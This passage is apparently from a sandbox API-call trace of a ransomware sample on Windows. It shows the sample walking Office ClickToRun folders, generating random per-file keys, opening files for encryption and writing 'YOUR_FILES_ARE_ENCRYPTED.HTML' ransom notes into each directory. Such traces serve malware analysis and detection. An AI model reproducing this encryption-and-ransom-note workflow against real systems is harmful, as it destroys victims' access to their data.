param_1="49") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="47") returned 2 [0105.034] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="2B") returned 2 [0105.034] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="2A") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="BE") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="56") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="F0") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="96") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="B1") returned 2 [0105.034] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="D8") returned 2 [0105.034] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="FC") returned 2 [0105.034] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="C9") returned 2 [0105.034] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="A8") returned 2 [0105.034] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="84") returned 2 [0105.034] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="3B") returned 2 [0105.034] lstrcpyW (in: lpString1=0x31233d4, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" [0105.034] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3113320, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.034] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3113320, lpOverlapped=0x3113320) returned 1 [0105.034] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da81e72, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da81e72, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa4efc6e1, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2f4107, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 1 [0105.035] StrStrIW (lpFirst="UserManifest.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.035] wnsprintfW (in: pszDest=0x3102310, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned 163 [0105.035] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0105.035] lstrlenW (lpString=".xml") returned 4 [0105.035] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0105.035] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0105.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0105.035] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=3096839) returned 1 [0105.035] GetProcessHeap () returned 0x600000 [0105.035] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b5388 [0105.037] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="98") returned 2 [0105.037] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="3E") returned 2 [0105.037] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="3B") returned 2 [0105.037] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="78") returned 2 [0105.037] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="8A") returned 2 [0105.037] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="4D") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="D4") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="01") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="C6") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="8D") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="88") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="D8") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="B1") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="E8") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A1") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="7B") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="56") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="C5") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="D0") returned 2 [0105.038] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="3A") returned 2 [0105.038] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="4A") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="FC") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="E8") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="82") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="EB") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="B6") returned 2 [0105.038] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="C8") returned 2 [0105.038] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="B0") returned 2 [0105.038] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="91") returned 2 [0105.038] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="A2") returned 2 [0105.038] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="FF") returned 2 [0105.038] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="0B") returned 2 [0105.039] lstrcpyW (in: lpString1=0x6c543c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" [0105.039] CreateIoCompletionPort (FileHandle=0x30c, ExistingCompletionPort=0x274, CompletionKey=0x6b5388, NumberOfConcurrentThreads=0x0) returned 0x274 [0105.039] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b5388, lpOverlapped=0x6b5388) returned 1 [0105.039] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da81e72, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da81e72, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa4efc6e1, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x2f4107, dwReserved0=0x630488, dwReserved1=0x62f4c8, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 0 [0105.039] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0105.039] wnsprintfW (in: pszDest=0x3102310, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0105.039] GetProcessHeap () returned 0x600000 [0105.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed4e8 [0105.039] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0105.040] WriteFile (in: hFile=0x324, lpBuffer=0x6ed4e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6ed4e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0105.041] CloseHandle (hObject=0x324) returned 1 [0105.041] GetProcessHeap () returned 0x600000 [0105.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed4e8 | out: hHeap=0x600000) returned 1 [0105.041] GetProcessHeap () returned 0x600000 [0105.041] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102310 | out: hHeap=0x600000) returned 1 [0105.041] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a743f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x87380caa, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x87380caa, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f54a, dwReserved1=0x62f4c0, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0105.042] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0105.042] wnsprintfW (in: pszDest=0x30f2308, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0105.042] GetProcessHeap () returned 0x600000 [0105.042] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed4e8 [0105.042] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0105.043] WriteFile (in: hFile=0x320, lpBuffer=0x6ed4e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6ed4e8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0105.044] CloseHandle (hObject=0x320) returned 1 [0105.044] GetProcessHeap () returned 0x600000 [0105.044] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed4e8 | out: hHeap=0x600000) returned 1 [0105.044] GetProcessHeap () returned 0x600000 [0105.044] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2308 | out: hHeap=0x600000) returned 1 [0105.045] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a616d, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a616d, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d450, dwReserved1=0x63d210, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0105.045] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0105.046] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0105.046] GetProcessHeap () returned 0x600000 [0105.046] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed4e8 [0105.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0105.046] WriteFile (in: hFile=0x31c, lpBuffer=0x6ed4e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6ed4e8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0105.047] CloseHandle (hObject=0x31c) returned 1 [0105.048] GetProcessHeap () returned 0x600000 [0105.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed4e8 | out: hHeap=0x600000) returned 1 [0105.048] GetProcessHeap () returned 0x600000 [0105.048] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0105.048] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="Packages", cAlternateFileName="")) returned 0 [0105.048] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0105.048] wnsprintfW (in: pszDest=0x6a3370, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0105.048] GetProcessHeap () returned 0x600000 [0105.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0105.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0105.048] WriteFile (in: hFile=0x314, lpBuffer=0x6dd4e0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x6dd4e0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0105.049] CloseHandle (hObject=0x314) returned 1 [0105.050] GetProcessHeap () returned 0x600000 [0105.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0105.050] GetProcessHeap () returned 0x600000 [0105.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a3370 | out: hHeap=0x600000) returned 1 [0105.051] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19ec60, dwReserved1=0xe87ea9, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0105.051] StrStrIW (lpFirst="Integration", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.051] wnsprintfW (in: pszDest=0x693368, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 63 [0105.051] GetProcessHeap () returned 0x600000 [0105.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6a3370 [0105.052] lstrcpyW (in: lpString1=0x6a3370, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" [0105.052] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*" [0105.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0105.053] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="..", cAlternateFileName="")) returned 1 [0105.053] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0105.053] StrStrIW (lpFirst="ShortcutBackups", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0105.053] wnsprintfW (in: pszDest=0x6a3370, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 79 [0105.053] GetProcessHeap () returned 0x600000 [0105.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0105.054] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0105.054] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0105.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x63d210, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0105.054] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x63d210, cFileName="..", cAlternateFileName="")) returned 1 [0105.054] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640128, dwReserved1=0x63d210, cFileName="..", cAlternateFileName="")) returned 0 [0105.054] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0105.054] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0105.054] GetProcessHeap () returned 0x600000 [0105.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed4e8 [0105.054] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0105.055] WriteFile (in: hFile=0x31c, lpBuffer=0x6ed4e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6ed4e8*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0105.115] CloseHandle (hObject=0x31c) returned 1 [0105.176] GetProcessHeap () returned 0x600000 [0105.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed4e8 | out: hHeap=0x600000) returned 1 [0105.176] GetProcessHeap () returned 0x600000 [0105.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0105.177] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d270, dwReserved1=0x63d208, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 0 [0105.177] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0105.177] wnsprintfW (in: pszDest=0x6a3370, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0105.177] GetProcessHeap () returned 0x600000 [0105.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6dd4e0 [0105.178] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 